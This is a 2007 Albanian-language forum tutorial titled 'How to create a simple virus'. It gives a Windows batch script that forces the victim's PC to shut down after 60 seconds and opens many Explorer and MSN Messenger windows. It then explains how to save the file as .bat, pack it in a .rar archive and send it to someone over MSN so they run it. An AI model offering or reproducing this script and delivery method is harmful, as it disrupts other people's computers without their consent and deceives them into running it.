Ku-Crew

Me Ku Crew drejt suksesit...
 
PortalliForumPytėsoriKėrkoRegjistrohuLista AnėtarėveGrupet e Anėtarėveidentifikimi

Share | 
 

 Si Te Krijojm Nje Virus Te Thjesht

Shko poshtė 
AutoriMesazh
s-kill

s-kill

Numri i postimeve : 83
Registration date : 27/12/2007

MesazhTitulli: Si Te Krijojm Nje Virus Te Thjesht   Sat Dec 29, 2007 12:10 am

Se pari duhet te hapim nje notepad dhe pasi qe e hapim percjellim

shutdown -s -t 60 -c " shkruani comentin tuaj"
explorer
explorer
start msnmsgr
start msnmsgr

Pak sqarim:

qekjo 60 osht sekondat per sa mu ndal PC e viktimes
qekjo explorer osht se i haet nje dritare dmth sa te mundeni shkrujeni explorer nmujsh shkruje 1 milion her aq ma i fort bohet virusi
qekjo start msnmsgr ja qel mesengjerin edhe kto shkrujeni shum her

edhe pasi qe ta mbushni kete procedur ne notepad shkoni

file>save as> shkruani emrin qfare doni mi ja ngjit edhe ruajeni.bat

dmth

emri.bat

edhe nese deshironi me ja dergu dikujna ne msn shnderoje ne .rar
dmth bone ne winrar edhe jau dergon

nese se keni kuptu

ktu e keni te sqarume ma mir
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit
 
Si Te Krijojm Nje Virus Te Thjesht
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
Ku-Crew :: Programe, Mėsime, Seriale, Dizajn :: Ebooks / Tutorial-
Kėrce tek: